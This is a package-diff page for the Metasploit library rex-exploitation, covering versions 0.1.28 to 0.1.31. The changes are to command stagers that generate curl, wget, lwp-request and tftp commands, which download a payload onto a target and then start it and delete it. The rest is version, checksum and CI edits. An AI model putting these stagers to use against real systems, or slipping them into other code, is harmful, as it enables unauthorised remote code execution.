RubyGems - rex-exploitation - Versions diffs - 0.1.28 → 0.1.31 - Mend

rex-exploitation 0.1.28 → 0.1.31

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (11) hide show

checksums.yaml +4 -4
checksums.yaml.gz.sig +0 -0
data/.github/workflows/verify.yml +1 -0
data/lib/rex/exploitation/cmdstager/curl.rb +4 -2
data/lib/rex/exploitation/cmdstager/lwprequest.rb +5 -1
data/lib/rex/exploitation/cmdstager/tftp.rb +35 -23
data/lib/rex/exploitation/cmdstager/wget.rb +5 -2
data/lib/rex/exploitation/version.rb +1 -1
data.tar.gz.sig +0 -0
metadata +2 -2
metadata.gz.sig +0 -0

checksums.yaml CHANGED Viewed

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: a55ad0e209e6bfeaccd5e0b21a6fab185a3607f0563281402aa7b3f471770f26
-  data.tar.gz: cab2892ed7e9a51590fd7e0214d0b5eb0d46c6b8ed090deb2f877e85e7d6b841
+  metadata.gz: 4cfc7e897b1f86f34cca1faca892489b396c010b3c7135c0954c0d6c720a8bea
+  data.tar.gz: '0289f22adbe9e4d83b786b8518653977e57b35e6456dedd1a546ca5d8e5289bb'
 SHA512:
-  metadata.gz: 04cd73b0220b13a6bfd2b67272a79ee8c86de698bacf7e36dfd404197d5bf27b3070fe9581de4e34eecdefcf4791c51681ef97d706d7a88ae52efd4f1637b7fd
-  data.tar.gz: 9f2b81f309f8214333ab91dd6f475a6be9cf050c689df8daa9b044155e83406777d4a51c155ea0a205b25bce7f845041311817e167eb9d57dba12a7f34b58bbd
+  metadata.gz: db9a31253749214b20d5a8a7bd58d16f72e540c3eb6a6291933220e7d5aad5286cc20bd4ffb6a15cf096ff6dbca49e74c492334d22a7fbaa798ba48e6eead925
+  data.tar.gz: be2a2215875f6ab4b5cf0f1752ac1a5fb11e2d20851e231bdb3bbc2775df84289912a3f95ae36480a2e7ec21db8c5bbaae311921c0b7a6612fef60dc7cd0000e

checksums.yaml.gz.sig CHANGED Viewed

Binary file

data/.github/workflows/verify.yml CHANGED Viewed

@@ -20,6 +20,7 @@ jobs:
           - 2.6
           - 2.7
           - 3.0
+          - 3.1
         test_cmd:
           - bundle exec rspec

data/lib/rex/exploitation/cmdstager/curl.rb CHANGED Viewed

@@ -24,11 +24,13 @@ class Rex::Exploitation::CmdStagerCurl < Rex::Exploitation::CmdStagerBase
   def generate_cmds_payload(opts)
     cmds = []
+    uri = opts[:payload_uri]
     if opts[:ssl]
-      cmds << "curl -kso #{@payload_path} #{opts[:payload_uri]}"
+      cmds << "curl -kso #{@payload_path} #{uri}"
     else
-      cmds << "curl -so #{@payload_path} #{opts[:payload_uri]}"
+      uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
+      cmds << "curl -so #{@payload_path} #{uri}"
     end
     cmds

data/lib/rex/exploitation/cmdstager/lwprequest.rb CHANGED Viewed

@@ -23,7 +23,11 @@ class Rex::Exploitation::CmdStagerLwpRequest < Rex::Exploitation::CmdStagerBase
   end
   def generate_cmds_payload(opts)
-    ["lwp-request -m GET #{opts[:payload_uri]} > #{@payload_path}"]
+    uri = opts[:payload_uri]
+    unless opts[:ssl]
+      uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
+    end
+    ["lwp-request -m GET #{uri} > #{@payload_path}"]
   end
   def generate_cmds_decoder(opts)

data/lib/rex/exploitation/cmdstager/tftp.rb CHANGED Viewed

@@ -13,7 +13,7 @@ module Exploitation
 # be written to disk and executed.
 #
 # This particular version uses tftp.exe to download a binary from the specified
-# server.  The original file is preserve, not encoded at all, and so this version
+# server. The original file is preserved, not encoded at all, and so this version
 # is significantly simpler than other methods.
 #
 # Requires: tftp.exe, outbound udp connectivity to a tftp server
@@ -24,14 +24,24 @@ module Exploitation
 class CmdStagerTFTP < CmdStagerBase
-  def initialize(exe)
-    super
-    @payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
+  def generate(opts = {})
+    if opts[:tftphost].nil?
+      raise "#{self.class.name}##{__callee__} missing opts[:tftphost]"
+    end
+    opts[:linemax] ||= @linemax
+    opts[:file] ||= "#{Rex::Text.rand_text_alpha(8)}.exe"
+    opts[:temp] ||= '%TEMP%'
+    @payload_exe = opts[:file]
+    @payload_path = opts[:temp] == '.' ? opts[:file] : "#{opts[:temp]}\\#{opts[:file]}"
+    generate_cmds(opts)
   end
   def setup(mod)
     self.tftp = Rex::Proto::TFTP::Server.new
-    self.tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
+    self.tftp.register_file(@payload_exe, exe)
     self.tftp.start
     mod.add_socket(self.tftp) # Hating myself for doing it... but it's just a first demo
   end
@@ -40,28 +50,30 @@ class CmdStagerTFTP < CmdStagerBase
     self.tftp.stop
   end
-  #
-  # We override compress commands just to stick in a few extra commands
-  # last second..
-  #
-  def compress_commands(cmds, opts)
-    # Initiate the download
-    cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}"
-    # Make it all happen
-    cmds << "start #{@tempdir + @payload_exe}"
-    # Clean up after unless requested not to..
-    if (not opts[:nodelete])
-      # XXX: We won't be able to delete the payload while it is running..
+  def generate_cmds_payload(opts)
+    cmds = []
+    # We can skip the destination argument if we're writing to the working directory,
+    # as tftp defaults to writing the file to the current directory with the same filename.
+    if opts[:file] == @payload_path
+      cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:file]}"
+    else
+      cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:file]} \"#{@payload_path}\""
     end
+    cmds
+  end
+  def generate_cmds_decoder(opts)
+    cmds = []
+    cmds << "start \"#{@payload_path}\""
+    # NOTE: We can't delete the payload while it is running.
+    cmds << "del \"#{@payload_path}\"" unless opts[:nodelete]
+    cmds
+  end
-    super
+  def cmd_concat_operator
+    ' & '
   end
-  # NOTE: We don't use a concatenation operator here since we only have a couple commands.
-  # There really isn't any need to combine them. Also, the ms01_026 exploit depends on
-  # the start command being issued separately so that it can ignore it :)
   attr_reader :exe
   attr_reader :payload_exe
   attr_accessor :tftp

data/lib/rex/exploitation/cmdstager/wget.rb CHANGED Viewed

@@ -24,12 +24,15 @@ class Rex::Exploitation::CmdStagerWget < Rex::Exploitation::CmdStagerBase
   def generate_cmds_payload(opts)
     cmds = []
+    uri = opts[:payload_uri]
     ncc  = '--no-check-certificate'
     if opts[:ssl]
-      cmds << "wget -qO #{@payload_path} #{ncc} #{opts[:payload_uri]}"
+      cmds << "wget -qO #{@payload_path} #{ncc} #{uri}"
     else
-      cmds << "wget -qO #{@payload_path} #{opts[:payload_uri]}"
+      uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
+      cmds << "wget -qO #{@payload_path} #{uri}"
     end
     cmds

data/lib/rex/exploitation/version.rb CHANGED Viewed

@@ -1,5 +1,5 @@
 module Rex
   module Exploitation
-    VERSION = "0.1.28"
+    VERSION = "0.1.31"
   end
 end

data.tar.gz.sig CHANGED Viewed

Binary file

metadata CHANGED Viewed

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: rex-exploitation
 version: !ruby/object:Gem::Version
-  version: 0.1.28
+  version: 0.1.31
 platform: ruby
 authors:
 - Metasploit Hackers
@@ -93,7 +93,7 @@ cert_chain:
   EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
   9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
   -----END CERTIFICATE-----
-date: 2021-09-16 00:00:00.000000000 Z
+date: 2022-07-01 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: rake

metadata.gz.sig CHANGED Viewed

Binary file